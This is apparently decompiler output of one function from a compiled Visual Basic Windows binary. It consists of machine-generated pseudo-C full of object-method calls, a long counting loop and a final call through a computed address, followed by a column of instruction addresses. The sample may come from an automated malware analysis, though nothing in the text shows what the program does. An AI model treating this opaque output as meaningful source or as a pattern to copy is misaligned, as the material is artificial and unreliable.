        				_v244 = _t995;
        				if(_v244 >= 0) {
        					_v400 = _v400 & 0x00000000;
        				} else {
        					_push(0x78);
        					_push(0x402cb4);
        					_push(_v240);
        					_push(_v244);
        					L0040137E();
        					_v400 = _t995;
        				}
        				if( *0x40e010 != 0) {
        					_v404 = 0x40e010;
        				} else {
        					_push(0x40e010);
        					_push(0x401f6c);
        					L00401360();
        					_v404 = 0x40e010;
        				}
        				_t999 =  &_v88;
        				L00401366();
        				_v248 = _t999;
        				_t1003 =  *((intOrPtr*)( *_v248 + 0xe0))(_v248,  &_v196, _t999,  *((intOrPtr*)( *((intOrPtr*)( *_v404)) + 0x310))( *_v404));
        				asm("fclex");
        				_v252 = _t1003;
        				if(_v252 >= 0) {
        					_v408 = _v408 & 0x00000000;
        				} else {
        					_push(0xe0);
        					_push(0x402d3c);
        					_push(_v248);
        					_push(_v252);
        					L0040137E();
        					_v408 = _t1003;
        				}
        				if( *0x40e010 != 0) {
        					_v412 = 0x40e010;
        				} else {
        					_push(0x40e010);
        					_push(0x401f6c);
        					L00401360();
        					_v412 = 0x40e010;
        				}
        				_t1267 =  *((intOrPtr*)( *_v412));
        				_t1007 =  &_v92;
        				L00401366();
        				_v256 = _t1007;
        				_t1011 =  *((intOrPtr*)( *_v256 + 0x130))(_v256,  &_v96, _t1007,  *((intOrPtr*)(_t1267 + 0x304))( *_v412));
        				asm("fclex");
        				_v260 = _t1011;
        				if(_v260 >= 0) {
        					_v416 = _v416 & 0x00000000;
        				} else {
        					_push(0x130);
        					_push(0x402cb4);
        					_push(_v256);
        					_push(_v260);
        					L0040137E();
        					_v416 = _t1011;
        				}
        				_v212 = 0x7a0394;
        				_v292 = _v96;
        				_v96 = _v96 & 0x00000000;
        				_v104 = _v292;
        				_v112 = 9;
        				_v228 = 0x3151d390;
        				_v224 = 0x5afa;
        				_v220 =  *0x401110;
        				_v208 = _v204;
        				_v416 =  *0x401108;
        				_v448 =  *0x401100;
        				 *((intOrPtr*)( *_a4 + 0x718))(_a4, _t1267, _t1267,  &_v208,  &_v220,  &_v228, _v196,  &_v112,  &_v212, _t1267,  &_v236);
        				_v76 = _v236;
        				_v72 = _v232;
        				_push( &_v92);
        				_push( &_v88);
        				_push( &_v84);
        				_push(3);
        				L00401348();
        				_t1356 = _t1355 + 0x10;
        				L00401372();
        				if( *0x40e010 != 0) {
        					_v420 = 0x40e010;
        				} else {
        					_push(0x40e010);
        					_push(0x401f6c);
        					L00401360();
        					_v420 = 0x40e010;
        				}
        				_t1031 =  &_v84;
        				L00401366();
        				_v240 = _t1031;
        				_t1035 =  *((intOrPtr*)( *_v240 + 0x68))(_v240,  &_v204, _t1031,  *((intOrPtr*)( *((intOrPtr*)( *_v420)) + 0x30c))( *_v420));
        				asm("fclex");
        				_v244 = _t1035;
        				if(_v244 >= 0) {
        					_v424 = _v424 & 0x00000000;
        				} else {
        					_push(0x68);
        					_push(0x402d5c);
        					_push(_v240);
        					_push(_v244);
        					L0040137E();
        					_v424 = _t1035;
        				}
        				if( *0x40e010 != 0) {
        					_v428 = 0x40e010;
        				} else {
        					_push(0x40e010);
        					_push(0x401f6c);
        					L00401360();
        					_v428 = 0x40e010;
        				}
        				_t1039 =  &_v88;
        				L00401366();
        				_v248 = _t1039;
        				_t1043 =  *((intOrPtr*)( *_v248 + 0x138))(_v248,  &_v208, _t1039,  *((intOrPtr*)( *((intOrPtr*)( *_v428)) + 0x2fc))( *_v428));
        				asm("fclex");
        				_v252 = _t1043;
        				if(_v252 >= 0) {
        					_v432 = _v432 & 0x00000000;
        				} else {
        					_push(0x138);
        					_push(0x402cb4);
        					_push(_v248);
        					_push(_v252);
        					L0040137E();
        					_v432 = _t1043;
        				}
        				_v212 = _v204;
        				_t1047 =  *((intOrPtr*)( *_a4 + 0x708))(_a4, 0x5573,  &_v212, _v208);
        				_v256 = _t1047;
        				if(_v256 >= 0) {
        					_v436 = _v436 & 0x00000000;
        				} else {
        					_push(0x708);
        					_push(0x402adc);
        					_push(_a4);
        					_push(_v256);
        					L0040137E();
        					_v436 = _t1047;
        				}
        				_push( &_v88);
        				_push( &_v84);
        				_push(2);
        				L00401348();
        				_t1357 = _t1356 + 0xc;
        				if( *0x40e010 != 0) {
        					_v440 = 0x40e010;
        				} else {
        					_push(0x40e010);
        					_push(0x401f6c);
        					L00401360();
        					_v440 = 0x40e010;
        				}
        				_t1053 =  &_v84;
        				L00401366();
        				_v240 = _t1053;
        				_t1057 =  *((intOrPtr*)( *_v240 + 0x140))(_v240,  &_v80, _t1053,  *((intOrPtr*)( *((intOrPtr*)( *_v440)) + 0x310))( *_v440));
        				asm("fclex");
        				_v244 = _t1057;
        				if(_v244 >= 0) {
        					_v444 = _v444 & 0x00000000;
        				} else {
        					_push(0x140);
        					_push(0x402d3c);
        					_push(_v240);
        					_push(_v244);
        					L0040137E();
        					_v444 = _t1057;
        				}
        				if( *0x40e010 != 0) {
        					_v448 = 0x40e010;
        				} else {
        					_push(0x40e010);
        					_push(0x401f6c);
        					L00401360();
        					_v448 = 0x40e010;
        				}
        				_t1280 =  *((intOrPtr*)( *_v448));
        				_t1061 =  &_v88;
        				L00401366();
        				_v248 = _t1061;
        				_t1065 =  *((intOrPtr*)( *_v248 + 0x80))(_v248,  &_v204, _t1061,  *((intOrPtr*)(_t1280 + 0x308))( *_v448));
        				asm("fclex");
        				_v252 = _t1065;
        				if(_v252 >= 0) {
        					_v452 = _v452 & 0x00000000;
        				} else {
        					_push(0x80);
        					_push(0x402d4c);
        					_push(_v248);
        					_push(_v252);
        					L0040137E();
        					_v452 = _t1065;
        				}
        				_v208 = _v204;
        				_v296 = _v80;
        				_v80 = _v80 & 0x00000000;
        				_v104 = _v296;
        				_v112 = 8;
        				 *_t1357 =  *0x4010f8;
        				_t1073 =  *((intOrPtr*)( *_a4 + 0x70c))(_a4,  &_v112, _t1280, _t1280,  &_v208,  &_v212);
        				_v256 = _t1073;
        				if(_v256 >= 0) {
        					_v456 = _v456 & 0x00000000;
        				} else {
        					_push(0x70c);
        					_push(0x402adc);
        					_push(_a4);
        					_push(_v256);
        					L0040137E();
        					_v456 = _t1073;
        				}
        				_v36 = _v212;
        				L00401348();
        				_t1358 = _t1357 + 0xc;
        				L00401372();
        				_t1078 =  *((intOrPtr*)( *_a4 + 0x2b4))(_a4, 2,  &_v84,  &_v88);
        				asm("fclex");
        				_v240 = _t1078;
        				if(_v240 >= 0) {
        					_v460 = _v460 & 0x00000000;
        				} else {
        					_push(0x2b4);
        					_push(0x402aa8);
        					_push(_a4);
        					_push(_v240);
        					L0040137E();
        					_v460 = _t1078;
        				}
        				_v272 = 0x5ae61;
        				_v268 = 1;
        				_v28 = _v28 & 0x00000000;
        				while(_v28 <= _v272) {
        					if( *0x40e010 != 0) {
        						_v464 = 0x40e010;
        					} else {
        						_push(0x40e010);
        						_push(0x401f6c);
        						L00401360();
        						_v464 = 0x40e010;
        					}
        					_t1084 =  &_v84;
        					L00401366();
        					_v240 = _t1084;
        					_t1088 =  *((intOrPtr*)( *_v240 + 0x140))(_v240,  &_v80, _t1084,  *((intOrPtr*)( *((intOrPtr*)( *_v464)) + 0x310))( *_v464));
        					asm("fclex");
        					_v244 = _t1088;
        					if(_v244 >= 0) {
        						_v468 = _v468 & 0x00000000;
        					} else {
        						_push(0x140);
        						_push(0x402d3c);
        						_push(_v240);
        						_push(_v244);
        						L0040137E();
        						_v468 = _t1088;
        					}
        					if( *0x40e010 != 0) {
        						_v472 = 0x40e010;
        					} else {
        						_push(0x40e010);
        						_push(0x401f6c);
        						L00401360();
        						_v472 = 0x40e010;
        					}
        					_t1291 =  *((intOrPtr*)( *_v472));
        					_t1092 =  &_v88;
        					L00401366();
        					_v248 = _t1092;
        					_t1096 =  *((intOrPtr*)( *_v248 + 0x80))(_v248,  &_v204, _t1092,  *((intOrPtr*)(_t1291 + 0x308))( *_v472));
        					asm("fclex");
        					_v252 = _t1096;
        					if(_v252 >= 0) {
        						_v476 = _v476 & 0x00000000;
        					} else {
        						_push(0x80);
        						_push(0x402d4c);
        						_push(_v248);
        						_push(_v252);
        						L0040137E();
        						_v476 = _t1096;
        					}
        					_v208 = _v204;
        					_v300 = _v80;
        					_v80 = _v80 & 0x00000000;
        					_v104 = _v300;
        					_v112 = 8;
        					 *_t1358 =  *0x4010f8;
        					_t1104 =  *((intOrPtr*)( *_a4 + 0x70c))(_a4,  &_v112, _t1291, _t1291,  &_v208,  &_v212);
        					_v256 = _t1104;
        					if(_v256 >= 0) {
        						_v480 = _v480 & 0x00000000;
        					} else {
        						_push(0x70c);
        						_push(0x402adc);
        						_push(_a4);
        						_push(_v256);
        						L0040137E();
        						_v480 = _t1104;
        					}
        					_v36 = _v212;
        					_push( &_v88);
        					_push( &_v84);
        					_push(2);
        					L00401348();
        					_t1359 = _t1358 + 0xc;
        					L00401372();
        					if( *0x40e010 != 0) {
        						_v484 = 0x40e010;
        					} else {
        						_push(0x40e010);
        						_push(0x401f6c);
        						L00401360();
        						_v484 = 0x40e010;
        					}
        					_t1110 =  &_v84;
        					L00401366();
        					_v240 = _t1110;
        					_t1114 =  *((intOrPtr*)( *_v240 + 0x68))(_v240,  &_v204, _t1110,  *((intOrPtr*)( *((intOrPtr*)( *_v484)) + 0x30c))( *_v484));
        					asm("fclex");
        					_v244 = _t1114;
        					if(_v244 >= 0) {
        						_v488 = _v488 & 0x00000000;
        					} else {
        						_push(0x68);
        						_push(0x402d5c);
        						_push(_v240);
        						_push(_v244);
        						L0040137E();
        						_v488 = _t1114;
        					}
        					if( *0x40e010 != 0) {
        						_v492 = 0x40e010;
        					} else {
        						_push(0x40e010);
        						_push(0x401f6c);
        						L00401360();
        						_v492 = 0x40e010;
        					}
        					_t1118 =  &_v88;
        					L00401366();
        					_v248 = _t1118;
        					_t1122 =  *((intOrPtr*)( *_v248 + 0x138))(_v248,  &_v208, _t1118,  *((intOrPtr*)( *((intOrPtr*)( *_v492)) + 0x2fc))( *_v492));
        					asm("fclex");
        					_v252 = _t1122;
        					if(_v252 >= 0) {
        						_v496 = _v496 & 0x00000000;
        					} else {
        						_push(0x138);
        						_push(0x402cb4);
        						_push(_v248);
        						_push(_v252);
        						L0040137E();
        						_v496 = _t1122;
        					}
        					_v212 = _v204;
        					_t1126 =  *((intOrPtr*)( *_a4 + 0x708))(_a4, 0x5573,  &_v212, _v208);
        					_v256 = _t1126;
        					if(_v256 >= 0) {
        						_v500 = _v500 & 0x00000000;
        					} else {
        						_push(0x708);
        						_push(0x402adc);
        						_push(_a4);
        						_push(_v256);
        						L0040137E();
        						_v500 = _t1126;
        					}
        					_push( &_v88);
        					_push( &_v84);
        					_push(2);
        					L00401348();
        					_t1360 = _t1359 + 0xc;
        					if( *0x40e010 != 0) {
        						_v504 = 0x40e010;
        					} else {
        						_push(0x40e010);
        						_push(0x401f6c);
        						L00401360();
        						_v504 = 0x40e010;
        					}
        					_t1132 =  &_v84;
        					L00401366();
        					_v240 = _t1132;
        					_t1136 =  *((intOrPtr*)( *_v240 + 0x158))(_v240,  &_v196, _t1132,  *((intOrPtr*)( *((intOrPtr*)( *_v504)) + 0x308))( *_v504));
        					asm("fclex");
        					_v244 = _t1136;
        					if(_v244 >= 0) {
        						_v508 = _v508 & 0x00000000;
        					} else {
        						_push(0x158);
        						_push(0x402d4c);
        						_push(_v240);
        						_push(_v244);
        						L0040137E();
        						_v508 = _t1136;
        					}
        					if( *0x40e010 != 0) {
        						_v512 = 0x40e010;
        					} else {
        						_push(0x40e010);
        						_push(0x401f6c);
        						L00401360();
        						_v512 = 0x40e010;
        					}
        					_t1140 =  &_v88;
        					L00401366();
        					_v248 = _t1140;
        					_t1144 =  *((intOrPtr*)( *_v248 + 0x1a0))(_v248,  &_v204, _t1140,  *((intOrPtr*)( *((intOrPtr*)( *_v512)) + 0x308))( *_v512));
        					asm("fclex");
        					_v252 = _t1144;
        					if(_v252 >= 0) {
        						_v516 = _v516 & 0x00000000;
        					} else {
        						_push(0x1a0);
        						_push(0x402d4c);
        						_push(_v248);
        						_push(_v252);
        						L0040137E();
        						_v516 = _t1144;
        					}
        					if( *0x40e010 != 0) {
        						_v520 = 0x40e010;
        					} else {
        						_push(0x40e010);
        						_push(0x401f6c);
        						L00401360();
        						_v520 = 0x40e010;
        					}
        					_t1307 =  *((intOrPtr*)( *_v520));
        					_t1148 =  &_v92;
        					L00401366();
        					_v256 = _t1148;
        					_t1152 =  *((intOrPtr*)( *_v256 + 0x108))(_v256,  &_v80, _t1148,  *((intOrPtr*)(_t1307 + 0x300))( *_v520));
        					asm("fclex");
        					_v260 = _t1152;
        					if(_v260 >= 0) {
        						_v524 = _v524 & 0x00000000;
        					} else {
        						_push(0x108);
        						_push(0x402cb4);
        						_push(_v256);
        						_push(_v260);
        						L0040137E();
        						_v524 = _t1152;
        					}
        					_v304 = _v80;
        					_v80 = _v80 & 0x00000000;
        					_v104 = _v304;
        					_v112 = 8;
        					_v228 =  *0x401128;
        					_v220 =  *0x401120;
        					_v136 = 0x8909d4;
        					_v144 = 3;
        					 *_t1360 =  *0x401118;
        					L00401240();
        					_t1346 =  &_v144;
        					_t1337 = _t1360;
        					asm("movsd");
        					asm("movsd");
        					asm("movsd");
        					asm("movsd");
        					_t1162 =  *((intOrPtr*)( *_a4 + 0x704))(_a4, 0x10,  &_v220, 0xdd379050, 0x5afa, _v196,  &_v228, _v204, _t1307, _t1307,  &_v112,  &_v208);
        					_v264 = _t1162;
        					if(_v264 >= 0) {
        						_v528 = _v528 & 0x00000000;
        					} else {
        						_push(0x704);
        						_push(0x402adc);
        						_push(_a4);
        						_push(_v264);
        						L0040137E();
        						_v528 = _t1162;
        					}
        					_v60 = _v208;
        					_push( &_v92);
        					_push( &_v88);
        					_push( &_v84);
        					_push(3);
        					L00401348();
        					_t1358 = _t1360 + 0x10;
        					L00401372();
        					_t1168 = _v28 + _v268;
        					if(_t1168 < 0) {
        						L0040133C();
        						_t1361 = _t1358 - 0xc;
        						 *[fs:0x0] = _t1361;
        						L00401240();
        						_v816 = _t1361;
        						_v812 = 0x401178;
        						_v808 = 0;
        						 *((intOrPtr*)( *_v796 + 4))(_v796, _t1337, _t1346, _t1227,  *[fs:0x0], 0x401246, _t1348);
        						if( *0x40e010 != 0) {
        							_v124 = 0x40e010;
        						} else {
        							_push(0x40e010);
        							_push(0x401f6c);
        							L00401360();
        							_v124 = 0x40e010;
        						}
        						_t1177 =  &_v32;
        						L00401366();
        						_v88 = _t1177;
        						_t1181 =  *((intOrPtr*)( *_v88 + 0x120))(_v88,  &_v80, _t1177,  *((intOrPtr*)( *((intOrPtr*)( *_v124)) + 0x30c))( *_v124));
        						asm("fclex");
        						_v92 = _t1181;
        						if(_v92 >= 0) {
        							_v128 = _v128 & 0x00000000;
        						} else {
        							_push(0x120);
        							_push(0x402d5c);
        							_push(_v88);
        							_push(_v92);
        							L0040137E();
        							_v128 = _t1181;
        						}
        						_v52 = _v80;
        						_v60 = 3;
        						_t1183 =  &_v60;
        						_push(_t1183);
        						L00401336();
        						_v96 =  ~(0 | _t1183 != 0x0000ffff);
        						L00401378();
        						L00401372();
        						_t1184 = _v96;
        						if(_t1184 == 0) {
        							L207:
        							asm("wait");
        							_push(0x40c4f9);
        							return _t1184;
        						} else {
        							if( *0x40e010 != 0) {
        								_v132 = 0x40e010;
        							} else {
        								_push(0x40e010);
        								_push(0x401f6c);
        								L00401360();
        								_v132 = 0x40e010;
        							}
        							_t1188 =  &_v32;
        							L00401366();
        							_v88 = _t1188;
        							_t1192 =  *((intOrPtr*)( *_v88 + 0x180))(_v88,  &_v80, _t1188,  *((intOrPtr*)( *((intOrPtr*)( *_v132)) + 0x30c))( *_v132));
        							asm("fclex");
        							_v92 = _t1192;
        							if(_v92 >= 0) {
        								_v136 = _v136 & 0x00000000;
        							} else {
        								_push(0x180);
        								_push(0x402d5c);
        								_push(_v88);
        								_push(_v92);
        								L0040137E();
        								_v136 = _t1192;
        							}
        							if( *0x40e010 != 0) {
        								_v140 = 0x40e010;
        							} else {
        								_push(0x40e010);
        								_push(0x401f6c);
        								L00401360();
        								_v140 = 0x40e010;
        							}
        							_t1196 =  &_v36;
        							L00401366();
        							_v96 = _t1196;
        							_t1200 =  *((intOrPtr*)( *_v96 + 0x100))(_v96,  &_v40, _t1196,  *((intOrPtr*)( *((intOrPtr*)( *_v140)) + 0x30c))( *_v140));
        							asm("fclex");
        							_v100 = _t1200;
        							if(_v100 >= 0) {
        								_v144 = _v144 & 0x00000000;
        							} else {
        								_push(0x100);
        								_push(0x402d5c);
        								_push(_v96);
        								_push(_v100);
        								L0040137E();
        								_v144 = _t1200;
        							}
        							_push(0);
        							_push(0);
        							_push(_v40);
        							_push( &_v60);
        							L00401330();
        							_t1362 = _t1361 + 0x10;
        							if( *0x40e010 != 0) {
        								_v148 = 0x40e010;
        							} else {
        								_push(0x40e010);
        								_push(0x401f6c);
        								L00401360();
        								_v148 = 0x40e010;
        							}
        							_t1325 =  *((intOrPtr*)( *_v148));
        							_t1205 =  &_v44;
        							L00401366();
        							_v104 = _t1205;
        							_t1209 =  *((intOrPtr*)( *_v104 + 0x60))(_v104,  &_v84, _t1205,  *((intOrPtr*)(_t1325 + 0x310))( *_v148));
        							asm("fclex");
        							_v108 = _t1209;
        							if(_v108 >= 0) {
        								_v152 = _v152 & 0x00000000;
        							} else {
        								_push(0x60);
        								_push(0x402d3c);
        								_push(_v104);
        								_push(_v108);
        								L0040137E();
        								_v152 = _t1209;
        							}
        							L0040132A();
        							_t1448 =  *0x401168;
        							 *_t1362 = _t1448;
        							asm("fild dword [ebp-0x4c]");
        							_v156 = _t1448;
        							_t1449 = _v156;
        							 *_t1362 = _t1449;
        							_t1210 =  &_v60;
        							L00401324();
        							_v160 = _t1210;
        							asm("fild dword [ebp-0x98]");
        							_v164 = _t1449;
        							_t1450 = _v164;
        							 *_t1362 = _t1450;
        							asm("fild dword [ebp-0x48]");
        							_v168 = _t1450;
        							 *_t1362 = _v168;
        							_t1213 =  *((intOrPtr*)( *_v0 + 0x2c8))(_v0, 6, _t1325, _t1325, _t1210, _t1325, _t1325, _t1209);
        							asm("fclex");
        							_v112 = _t1213;
        							if(_v112 >= 0) {
        								_v172 = _v172 & 0x00000000;
        							} else {
        								_push(0x2c8);
        								_push(0x402aa8);
        								_push(_v0);
        								_push(_v112);
        								L0040137E();
        								_v172 = _t1213;
        							}
        							_push( &_v40);
        							_push( &_v44);
        							_push( &_v36);
        							_t1184 =  &_v32;
        							_push(_t1184);
        							_push(4);
        							L00401348();
        							L00401372();
        							goto L207;
        						}
        					} else {
        						_v28 = _t1168;
        						continue;
        					}
        					break;
        				}
        				_t1080 =  *((intOrPtr*)(0x2c1572 +  *_t1358))(0x147e9d);
        				_push(0x40c127);
        				L00401372();
        				L00401378();
        				return _t1080;
        			}





































































































































































































































        0x0040a7c4
        0x0040a7c5
        0x0040a7c7
        0x0040a7d6
        0x0040a7e2
        0x0040a7ea
        0x0040a7ed
        0x0040a7fa
        0x0040a803
        0x0040a80e
        0x0040a811
        0x0040a81b
        0x0040a825
        0x0040a82f
        0x0040a845
        0x0040a84b
        0x0040a84d
        0x0040a85a
        0x0040a87c
        0x0040a85c
        0x0040a85c
        0x0040a861
        0x0040a866
        0x0040a869
        0x0040a86f
        0x0040a874
        0x0040a874
        0x0040a883
        0x0040a886
        0x0040a893
        0x0040a894
        0x0040a895
        0x0040a896
        0x0040a897
        0x0040a89a
        0x0040a8a7
        0x0040a8a8
        0x0040a8a9
        0x0040a8aa
        0x0040a8ab
        0x0040a8ad
        0x0040a8b2
        0x0040a8b5
        0x0040a8b8
        0x0040a8b9
        0x0040a8be
        0x0040a8c1
        0x0040a8c2
        0x0040a8c7
        0x0040a8cb
        0x0040a8cc
        0x0040a8d4
        0x0040a8dc
        0x0040a8e1
        0x0040a8eb
        0x0040a8f5
        0x0040a8f8
        0x0040a905
        0x0040a906
        0x0040a907
        0x0040a908
        0x0040a909
        0x0040a90e
        0x0040a911
        0x0040a91d
        0x0040a93a
        0x0040a91f
        0x0040a91f
        0x0040a924
        0x0040a929
        0x0040a92e
        0x0040a92e
        0x0040a95e
        0x0040a962
        0x0040a967
        0x0040a982
        0x0040a988
        0x0040a98a
        0x0040a997
        0x0040a9bc
        0x0040a999
        0x0040a999
        0x0040a99e
        0x0040a9a3
        0x0040a9a9
        0x0040a9af
        0x0040a9b4
        0x0040a9b4
        0x0040a9ca
        0x0040a9d1
        0x0040a9db
        0x0040a9de
        0x0040a9eb
        0x0040a9ec
        0x0040a9ed
        0x0040a9ee
        0x0040a9ef
        0x0040a9f4
        0x0040a9f7
        0x0040a9ff
        0x0040aa04
        0x0040aa0b
        0x0040aa15
        0x0040aa18
        0x0040aa25
        0x0040aa26
        0x0040aa27
        0x0040aa28
        0x0040aa29
        0x0040aa2e
        0x0040aa31
        0x0040aa36
        0x0040aa3d
        0x0040aa47
        0x0040aa49
        0x0040aa4e
        0x0040aa51
        0x0040aa54
        0x0040aa55
        0x0040aa5a
        0x0040aa5d
        0x0040aa5e
        0x0040aa64
        0x0040aa65
        0x0040aa6a
        0x0040aa74
        0x0040aa82
        0x0040aa8f
        0x0040aaac
        0x0040aa91
        0x0040aa91
        0x0040aa96
        0x0040aa9b
        0x0040aaa0
        0x0040aaa0
        0x0040aabe
        0x0040aad6
        0x0040aad9
        0x0040aadb
        0x0040aae8
        0x0040ab0a
        0x0040aaea
        0x0040aaea
        0x0040aaec
        0x0040aaf1
        0x0040aaf7
        0x0040aafd
        0x0040ab02
        0x0040ab02
        0x0040ab14
        0x0040ab28
        0x0040ab2b
        0x0040ab2d
        0x0040ab3a
        0x0040ab5c
        0x0040ab3c
        0x0040ab3c
        0x0040ab3e
        0x0040ab43
        0x0040ab49
        0x0040ab4f
        0x0040ab54
        0x0040ab54
        0x0040ab66
        0x0040ab66
        0x0040ab72
        0x0040ab8f
        0x0040ab74
        0x0040ab74
        0x0040ab79
        0x0040ab7e
        0x0040ab83
        0x0040ab83
        0x0040abb3
        0x0040abb7
        0x0040abbc
        0x0040abd7
        0x0040abdd
        0x0040abdf
        0x0040abec
        0x0040ac11
        0x0040abee
        0x0040abee
        0x0040abf3
        0x0040abf8
        0x0040abfe
        0x0040ac04
        0x0040ac09
        0x0040ac09
        0x0040ac18
        0x0040ac21
        0x0040ac28
        0x0040ac48
        0x0040ac4e
        0x0040ac5b
        0x0040ac7d
        0x0040ac5d
        0x0040ac5d
        0x0040ac62
        0x0040ac67
        0x0040ac6a
        0x0040ac70
        0x0040ac75
        0x0040ac75
        0x0040ac87
        0x0040ac8f
        0x0040ac9b
        0x0040acb8
        0x0040ac9d
        0x0040ac9d
        0x0040aca2
        0x0040aca7
        0x0040acac
        0x0040acac
        0x0040acd2
        0x0040acdc
        0x0040ace0
        0x0040ace5
        0x0040acfd
        0x0040ad00
        0x0040ad02
        0x0040ad0f
        0x0040ad31
        0x0040ad11
        0x0040ad11
        0x0040ad13
        0x0040ad18
        0x0040ad1e
        0x0040ad24
        0x0040ad29
        0x0040ad29
        0x0040ad38
        0x0040ad42
        0x0040ad4c
        0x0040ad53
        0x0040ad60
        0x0040ad69
        0x0040ad6f
        0x0040ad79
        0x0040ad7c
        0x0040ad83
        0x0040ad8d
        0x0040adb1
        0x0040adc7
        0x0040addd
        0x0040ade3
        0x0040adf0
        0x0040ae12
        0x0040adf2
        0x0040adf2
        0x0040adf7
        0x0040adfc
        0x0040adff
        0x0040ae05
        0x0040ae0a
        0x0040ae0a
        0x0040ae20
        0x0040ae27
        0x0040ae36
        0x0040ae3b
        0x0040ae4d
        0x0040ae53
        0x0040ae60
        0x0040ae82
        0x0040ae62
        0x0040ae62
        0x0040ae67
        0x0040ae6c
        0x0040ae6f
        0x0040ae75
        0x0040ae7a
        0x0040ae7a
        0x0040ae90
        0x0040ae9b
        0x0040aeb8
        0x0040ae9d
        0x0040ae9d
        0x0040aea2
        0x0040aea7
        0x0040aeac
        0x0040aeac
        0x0040aed2
        0x0040aedc
        0x0040aee0
        0x0040aee5
        0x0040af00
        0x0040af06
        0x0040af08
        0x0040af15
        0x0040af3a
        0x0040af17
        0x0040af17
        0x0040af1c
        0x0040af21
        0x0040af27
        0x0040af2d
        0x0040af32
        0x0040af32
        0x0040af47
        0x0040af53
        0x0040af59
        0x0040af69
        0x0040af8c
        0x0040af97
        0x0040afa4
        0x0040afa5
        0x0040afa6
        0x0040afa7
        0x0040afb7
        0x0040afc3
        0x0040afcb
        0x0040afd7
        0x0040aff4
        0x0040afd9
        0x0040afd9
        0x0040afde
        0x0040afe3
        0x0040afe8
        0x0040afe8
        0x0040b018
        0x0040b01c
        0x0040b021
        0x0040b03c
        0x0040b042
        0x0040b044
        0x0040b051
        0x0040b076
        0x0040b053
        0x0040b053
        0x0040b058
        0x0040b05d
        0x0040b063
        0x0040b069
        0x0040b06e
        0x0040b06e
        0x0040b084
        0x0040b0a1
        0x0040b086
        0x0040b086
        0x0040b08b
        0x0040b090
        0x0040b095
        0x0040b095
        0x0040b0c5
        0x0040b0c9
        0x0040b0ce
        0x0040b0e9
        0x0040b0ef
        0x0040b0f1
        0x0040b0fe
        0x0040b123
        0x0040b100
        0x0040b100
        0x0040b105
        0x0040b10a
        0x0040b110
        0x0040b116
        0x0040b11b
        0x0040b11b
        0x0040b131
        0x0040b14e
        0x0040b133
        0x0040b133
        0x0040b138
        0x0040b13d
        0x0040b142
        0x0040b142
        0x0040b168
        0x0040b172
        0x0040b176
        0x0040b17b
        0x0040b193
        0x0040b199
        0x0040b19b
        0x0040b1a8
        0x0040b1cd
        0x0040b1aa
        0x0040b1aa
        0x0040b1af
        0x0040b1b4
        0x0040b1ba
        0x0040b1c0
        0x0040b1c5
        0x0040b1c5
        0x0040b1d7
        0x0040b1dd
        0x0040b1e7
        0x0040b1ea
        0x0040b1f7
        0x0040b203
        0x0040b209
        0x0040b213
        0x0040b230
        0x0040b25a
        0x0040b267
        0x0040b268
        0x0040b269
        0x0040b26a
        0x0040b273
        0x0040b279
        0x0040b286
        0x0040b2a8
        0x0040b288
        0x0040b288
        0x0040b28d
        0x0040b292
        0x0040b295
        0x0040b29b
        0x0040b2a0
        0x0040b2a0
        0x0040b2b5
        0x0040b2bb
        0x0040b2bf
        0x0040b2c3
        0x0040b2c4
        0x0040b2c6
        0x0040b2cb
        0x0040b2d1
        0x0040b2dd
        0x0040b2fa
        0x0040b2df
        0x0040b2df
        0x0040b2e4
        0x0040b2e9
        0x0040b2ee
        0x0040b2ee
        0x0040b31e
        0x0040b322
        0x0040b327
        0x0040b342
        0x0040b345
        0x0040b347
        0x0040b354
        0x0040b376
        0x0040b356
        0x0040b356
        0x0040b358
        0x0040b35d
        0x0040b363
        0x0040b369
        0x0040b36e
        0x0040b36e
        0x0040b384
        0x0040b3a1
        0x0040b386
        0x0040b386
        0x0040b38b
        0x0040b390
        0x0040b395
        0x0040b395
        0x0040b3c5
        0x0040b3c9
        0x0040b3ce
        0x0040b3e9
        0x0040b3ef
        0x0040b3f1
        0x0040b3fe
        0x0040b423
        0x0040b400
        0x0040b400
        0x0040b405
        0x0040b40a
        0x0040b410
        0x0040b416
        0x0040b41b
        0x0040b41b
        0x0040b431
        0x0040b44e
        0x0040b433
        0x0040b433
        0x0040b438
        0x0040b43d
        0x0040b442
        0x0040b442
        0x0040b468
        0x0040b472
        0x0040b476
        0x0040b47b
        0x0040b493
        0x0040b499
        0x0040b49b
        0x0040b4a8
        0x0040b4cd
        0x0040b4aa
        0x0040b4aa
        0x0040b4af
        0x0040b4b4
        0x0040b4ba
        0x0040b4c0
        0x0040b4c5
        0x0040b4c5
        0x0040b4d4
        0x0040b4e1
        0x0040b4e7
        0x0040b4f1
        0x0040b4f4
        0x0040b4fb
        0x0040b505
        0x0040b515
        0x0040b521
        0x0040b535
        0x0040b566
        0x0040b571
        0x0040b57d
        0x0040b586
        0x0040b58c
        0x0040b590
        0x0040b594
        0x0040b595
        0x0040b597
        0x0040b59c
        0x0040b5a2
        0x0040b5ae
        0x0040b5cb
        0x0040b5b0
        0x0040b5b0
        0x0040b5b5
        0x0040b5ba
        0x0040b5bf
        0x0040b5bf
        0x0040b5ef
        0x0040b5f3
        0x0040b5f8
        0x0040b613
        0x0040b616
        0x0040b618
        0x0040b625
        0x0040b647
        0x0040b627
        0x0040b627
        0x0040b629
        0x0040b62e
        0x0040b634
        0x0040b63a
        0x0040b63f
        0x0040b63f
        0x0040b655
        0x0040b672
        0x0040b657
        0x0040b657
        0x0040b65c
        0x0040b661
        0x0040b666
        0x0040b666
        0x0040b696
        0x0040b69a
        0x0040b69f
        0x0040b6ba
        0x0040b6c0
        0x0040b6c2
        0x0040b6cf
        0x0040b6f4
        0x0040b6d1
        0x0040b6d1
        0x0040b6d6
        0x0040b6db
        0x0040b6e1
        0x0040b6e7
        0x0040b6ec
        0x0040b6ec
        0x0040b701
        0x0040b721
        0x0040b727
        0x0040b734
        0x0040b756
        0x0040b736
        0x0040b736
        0x0040b73b
        0x0040b740
        0x0040b743
        0x0040b749
        0x0040b74e
        0x0040b74e
        0x0040b760
        0x0040b764
        0x0040b765
        0x0040b767
        0x0040b76c
        0x0040b776
        0x0040b793
        0x0040b778
        0x0040b778
        0x0040b77d
        0x0040b782
        0x0040b787
        0x0040b787
        0x0040b7b7
        0x0040b7bb
        0x0040b7c0
        0x0040b7d8
        0x0040b7de
        0x0040b7e0
        0x0040b7ed
        0x0040b812
        0x0040b7ef
        0x0040b7ef
        0x0040b7f4
        0x0040b7f9
        0x0040b7ff
        0x0040b805
        0x0040b80a
        0x0040b80a
        0x0040b820
        0x0040b83d
        0x0040b822
        0x0040b822
        0x0040b827
        0x0040b82c
        0x0040b831
